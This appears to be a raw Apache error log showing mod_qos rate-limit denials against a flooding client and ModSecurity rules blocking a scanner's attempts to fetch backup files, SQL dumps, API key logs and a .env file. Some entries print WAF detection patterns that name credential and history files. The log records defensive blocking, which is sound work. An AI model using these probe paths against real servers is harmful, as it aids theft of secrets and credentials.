[Tue May 26 19:54:14.567175 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOqwAAABs
[Tue May 26 19:54:14.592573 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4jQAAANI
[Tue May 26 19:54:14.592957 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4jAAAAP4
[Tue May 26 19:54:14.702739 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOrAAAACQ
[Tue May 26 19:54:14.702838 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4kAAAANw
[Tue May 26 19:54:14.703493 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:34904] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4kgAAAKI
[Tue May 26 19:54:14.705661 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4kwAAAOU
[Tue May 26 19:54:14.707330 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOrQAAAD0
[Tue May 26 19:54:14.707428 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4lAAAAJQ
[Tue May 26 19:54:14.713783 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4lQAAAOE
[Tue May 26 19:54:14.714489 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDmDRMqfxdEDkoszOrgAAAEo
[Tue May 26 19:54:14.743827 2026] [qos:error] [pid 86490:tid 86741] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4mQAAAP4
[Tue May 26 19:54:14.745640 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtDlZMwN0DpLVWo6K4mgAAAL0
[Tue May 26 19:54:14.875850 2026] [security2:error] [pid 93576:tid 93782] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOmgAAAEY"]
[Tue May 26 19:54:15.206662 2026] [security2:error] [pid 86490:tid 86651] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cart.php.old"] [unique_id "ahWtD1ZMwN0DpLVWo6K4nQAAAKQ"]
[Tue May 26 19:54:15.279778 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDWDRMqfxdEDkoszOhQAAABE"]
[Tue May 26 19:54:15.287671 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K3_AAAAOA"]
[Tue May 26 19:54:15.297356 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDWDRMqfxdEDkoszOhAAAAFs"]
[Tue May 26 19:54:15.299470 2026] [security2:error] [pid 86490:tid 86728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4EgAAAPE"]
[Tue May 26 19:54:15.300326 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K35wAAAOY"]
[Tue May 26 19:54:15.300855 2026] [security2:error] [pid 86490:tid 86642] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4AwAAAJs"]
[Tue May 26 19:54:15.301991 2026] [security2:error] [pid 86490:tid 86624] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K3_gAAAIk"]
[Tue May 26 19:54:15.303891 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDWDRMqfxdEDkoszOhgAAABM"]
[Tue May 26 19:54:15.304762 2026] [security2:error] [pid 93868:tid 94285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDUqK9k_ZUB2Vp25HUgAAAao"]
[Tue May 26 19:54:15.307282 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4FgAAAMM"]
[Tue May 26 19:54:15.310848 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4EwAAAPo"]
[Tue May 26 19:54:15.311375 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4FQAAALM"]
[Tue May 26 19:54:15.312135 2026] [security2:error] [pid 86490:tid 86661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4AQAAAK4"]
[Tue May 26 19:54:15.318923 2026] [security2:error] [pid 86490:tid 86659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4IAAAAKw"]
[Tue May 26 19:54:15.320300 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDUqK9k_ZUB2Vp25HUwAAAb0"]
[Tue May 26 19:54:15.333451 2026] [security2:error] [pid 86490:tid 86732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4AAAAAPU"]
[Tue May 26 19:54:15.338226 2026] [security2:error] [pid 86490:tid 86681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4IwAAAMI"]
[Tue May 26 19:54:15.342340 2026] [security2:error] [pid 93868:tid 94275] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HXgAAAaA"]
[Tue May 26 19:54:15.345737 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4FwAAAMo"]
[Tue May 26 19:54:15.353012 2026] [security2:error] [pid 86490:tid 86746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K3_wAAAQM"]
[Tue May 26 19:54:15.363232 2026] [security2:error] [pid 93868:tid 94270] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDUqK9k_ZUB2Vp25HVAAAAZs"]
[Tue May 26 19:54:15.370640 2026] [security2:error] [pid 93576:tid 93738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOlQAAABo"]
[Tue May 26 19:54:15.377370 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOlAAAAC4"]
[Tue May 26 19:54:15.388341 2026] [security2:error] [pid 86490:tid 86709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4IQAAAN4"]
[Tue May 26 19:54:15.400707 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOkwAAAEw"]
[Tue May 26 19:54:15.401009 2026] [security2:error] [pid 93868:tid 94315] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HXwAAAcg"]
[Tue May 26 19:54:15.408732 2026] [security2:error] [pid 93868:tid 94346] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HYQAAAec"]
[Tue May 26 19:54:15.412851 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HZgAAAds"]
[Tue May 26 19:54:15.416220 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDVZMwN0DpLVWo6K4KAAAAJg"]
[Tue May 26 19:54:15.425149 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOlgAAAH0"]
[Tue May 26 19:54:15.425915 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HWAAAAfY"]
[Tue May 26 19:54:15.428160 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOmAAAAH4"]
[Tue May 26 19:54:15.438933 2026] [security2:error] [pid 86490:tid 86736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4cwAAAPk"]
[Tue May 26 19:54:15.442246 2026] [security2:error] [pid 86490:tid 86674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4dgAAALs"]
[Tue May 26 19:54:15.446488 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOlwAAACE"]
[Tue May 26 19:54:15.452808 2026] [security2:error] [pid 93868:tid 94312] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HYwAAAcU"]
[Tue May 26 19:54:15.533431 2026] [security2:error] [pid 86490:tid 86712] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/db/backup/db.sql"] [unique_id "ahWtD1ZMwN0DpLVWo6K4owAAAOE"]
[Tue May 26 19:54:15.694765 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/log.bak"] [unique_id "ahWtD1ZMwN0DpLVWo6K4pQAAAMw"]
[Tue May 26 19:54:16.043870 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEGDRMqfxdEDkoszO0AAAAAc
[Tue May 26 19:54:16.044006 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEGDRMqfxdEDkoszO0QAAAG0
[Tue May 26 19:54:16.044300 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K4-wAAALQ
[Tue May 26 19:54:16.048635 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K4_gAAAMw
[Tue May 26 19:54:16.053299 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K5AAAAALM
[Tue May 26 19:54:16.053580 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K5AQAAAKA
[Tue May 26 19:54:16.119712 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5BAAAANI
[Tue May 26 19:54:16.120813 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEFZMwN0DpLVWo6K5BgAAAOE
[Tue May 26 19:54:16.122444 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEGDRMqfxdEDkoszO1gAAAAg
[Tue May 26 19:54:16.125435 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtEGDRMqfxdEDkoszO1wAAAFU
[Tue May 26 19:54:16.181942 2026] [security2:error] [pid 86490:tid 86673] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/next-app/src/.env"] [unique_id "ahWtEFZMwN0DpLVWo6K5CwAAALo"]
[Tue May 26 19:54:16.193212 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5DAAAALQ
[Tue May 26 19:54:16.196867 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5DQAAANU
[Tue May 26 19:54:16.197297 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5DgAAAM4
[Tue May 26 19:54:16.197296 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEGDRMqfxdEDkoszO2AAAAGs
[Tue May 26 19:54:16.206339 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5DwAAANI
[Tue May 26 19:54:16.208936 2026] [qos:error] [pid 86490:tid 86712] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5EAAAAOE
[Tue May 26 19:54:16.271926 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5EQAAAN0
[Tue May 26 19:54:16.277532 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtEFZMwN0DpLVWo6K5EgAAALE
[Tue May 26 19:54:16.281375 2026] [security2:error] [pid 93868:tid 94350] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HZwAAAes"]
[Tue May 26 19:54:16.289360 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDmDRMqfxdEDkoszOmQAAAGQ"]
[Tue May 26 19:54:16.290096 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4ewAAAIw"]
[Tue May 26 19:54:16.294832 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDkqK9k_ZUB2Vp25HZAAAAZ4"]
[Tue May 26 19:54:16.301465 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4ggAAAK8"]
[Tue May 26 19:54:16.307717 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4gwAAAJM"]
[Tue May 26 19:54:16.316982 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4cAAAAJ8"]
[Tue May 26 19:54:16.317073 2026] [security2:error] [pid 86490:tid 86633] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4fQAAAJI"]
[Tue May 26 19:54:16.318605 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtDlZMwN0DpLVWo6K4cgAAAKk"]
